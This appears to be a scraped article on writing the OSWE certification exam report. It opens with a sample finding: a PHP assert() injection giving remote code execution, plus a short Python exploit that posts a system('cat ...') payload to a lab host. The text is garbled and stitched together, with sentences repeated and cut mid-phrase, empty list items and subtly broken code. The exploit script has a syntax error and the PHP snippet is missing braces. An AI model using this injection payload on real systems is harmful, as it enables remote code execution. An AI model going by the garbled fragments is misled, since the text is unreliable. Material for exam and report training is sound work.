Skip to content
English
Contact us Sign in
Go to cloudnine.com
  • There are no suggestions because the search field is empty.

Exam Report: Oswe

Vulnerability Title: Unauthenticated Remote Code Execution via assert() Injection in core/logic.class.php

Severity: Critical

Code Location: /modules/core/logic.class.php, lines 88-94

Code Snippet:

  public function runCommand($user_input) 
      $result = "";
      assert("$result = $user_input");
      return $result;

Vulnerability Analysis: The runCommand() method takes user-controlled input from the cmd POST parameter. The assert() function evaluates the string as PHP code. Since no sanitization is applied, an attacker can break out of the string concatenation by injecting '.phpinfo().', leading to arbitrary code execution. oswe exam report

Exploit Script (exploit_assert_rce.py):

import requests
target = "http://192.168.1.100/index.php?action=run"
payload = "'.system('cat /var/www/local.txt').'"
r = requests.post(target, data="cmd": payload)
print(r.text) # Extracts local.txt

Proof: [Screenshot of exploit output showing local.txt hash: "OSWE8a3f..."]

Remediation: Remove assert() for dynamic code evaluation. Use a switch-case block or a whitelist of allowed commands. If dynamic logic is required, use a secure template engine or sandboxed evaluation environment.

The Offensive Security Web Expert (OSWE) certification is widely regarded as one of the most challenging and respected web application security credentials in the industry. Unlike multiple-choice exams or simple CTF competitions, the OSWE exam requires candidates to perform a white-box penetration test (source code review) on two complex web applications and then articulate their findings with surgical precision. Proof: [Screenshot of exploit output showing local

Here is the truth that many candidates learn the hard way: You do not fail the OSWE because you cannot hack the box. You fail the OSWE because you cannot write the report.

The OSWE exam report is not an afterthought; it is 50% of the exam. No matter how elegant your Python exploit script or how deep your static code analysis, if your report is unclear, incomplete, or fails to meet Offensive Security’s rigorous standards, you will see the dreaded "Fail" status.

This article is a deep dive into everything you need to know about the OSWE exam report. We will cover structure, common pitfalls, the "reproduction steps" nightmare, automation, and the exact checklist to use before you hit "submit."

For each vulnerability use this sub‑structure: you find a SQL injection

# OSWE Exam Report
**Student ID:** OS-XXXXX
**Date:** YYYY-MM-DD

You show a weakness but not the surrounding code. For instance, you find a SQL injection, but you don’t show the sanitization attempt (e.g., addslashes()) that you bypassed. The examiner needs to see why the developer’s fix failed.


Solution: Include 10 lines above and below the vulnerable code.


Before we discuss formatting, let's discuss psychology. Offensive Security exams (OSCP, OSWP, OSWE, OSEP) are unique because they simulate a real-world consultant’s workflow.


In the real world, a client pays you to find vulnerabilities. But if you cannot explain to the development team exactly how to trigger the bug and exactly where to fix it in the source code, your hack is useless.


The OSWE report is a white-box deliverable. This means:





This distinguishes OSWE from other certs. You must document how your automated exploit works.




  • Usage Output: Provide a screenshot of the script running successfully in your terminal.
    •